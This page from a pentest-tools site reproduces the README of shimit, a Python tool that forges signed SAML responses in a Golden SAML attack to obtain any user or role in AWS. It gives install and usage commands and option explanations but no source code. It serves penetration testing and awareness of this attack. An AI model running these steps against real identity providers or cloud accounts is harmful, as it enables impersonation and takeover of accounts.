Pentest Tools

Published on January 7th, 2018 📆 | 5428 Views ⚑

0

shimit – A tool that implements the Golden SAML attack


iSpeech
shimitΒ is a python tool that implements the Golden SAML attack. More informations on this can be found in the followingΒ articleΒ on our blog.

python .\shimit.py -h
usage: shimit.py [-h] -pk KEY [-c CERT] [-sp SP] -idp IDP -u USER [-reg REGION]
                 [--SessionValidity SESSION_VALIDITY] [--SamlValidity SAML_VALIDITY] -n SESSION_NAME
                 -r ROLES -id ARN [-o OUT_FILE] [-l LOAD_FILE] [-t TIME]
                 
              β–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—     β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—  
             β–ˆβ–ˆβ•”β•   β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•    β–ˆβ–ˆβ•”β• β•šβ–ˆβ–ˆβ•— 
            β–ˆβ–ˆβ•”β•    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘      β–ˆβ–ˆβ•”β•   β•šβ–ˆβ–ˆβ•—
            β•šβ–ˆβ–ˆβ•—    β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•”β•    β–ˆβ–ˆβ•”β•
             β•šβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘    β–ˆβ–ˆβ•”β•    β–ˆβ–ˆβ•”β• 
              β•šβ•β•   β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•β•šβ•β•β•šβ•β•     β•šβ•β•β•šβ•β•   β•šβ•β•    β•šβ•β•     β•šβ•β•

Overview
In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application.
shimitΒ allows the user to create a signedΒ SAMLResponseΒ object, and use it to open a session in the Service Provider.Β shimitΒ now supportsΒ AWSΒ Console as aΒ Service Provider, more are in the works...

AWS
After generating and signing theΒ SAMLResponse'sΒ assertion, shimit will call theΒ AssumeRoleWithSAML()Β API in AWS. Then, the session token and key will be applied to a new session, where the user can use aws cli to perform action using the permissions obtained using theΒ golden SAML.

Requirements:
For installing the required modules, run the following command:

python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

AWS cli
Needs to be installed in order to use the credentials obtained. Can be downloaded forΒ WindowsΒ orΒ LinuxΒ from these links.

Usage:

Apply session forΒ AWSΒ cli

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

idpΒ - Identity Provider URL e.g.Β http://server.domain.com/adfs/services/trust
pkΒ - Private key file full path (pem format)
cΒ - Certificate file full path (pem format)
uΒ - User and domain name e.g. domain\username (use \ or quotes in *nix)
nΒ - Session name in AWS
rΒ - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.
idΒ -Β AWSΒ account id e.g. 123456789012





[adsense size='1' ]

Save SAMLResponse to file

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml

oΒ - Output encoded SAMLResponse to a specified file path

Load SAMLResponse from file

python .\shimit.py -l saml_response.xml

lΒ - Load SAMLResponse from a specified file path

Contributions
shimitΒ supportsΒ AWSΒ as a service provider at the moment, as a POC. We highly encourage you to conribute with a new modules for other service providers.

Download shimit



Comments are closed.






Β© Torchsec Β Privacy PolicyΒ Disclaimer Β T&C



Back to Top ↑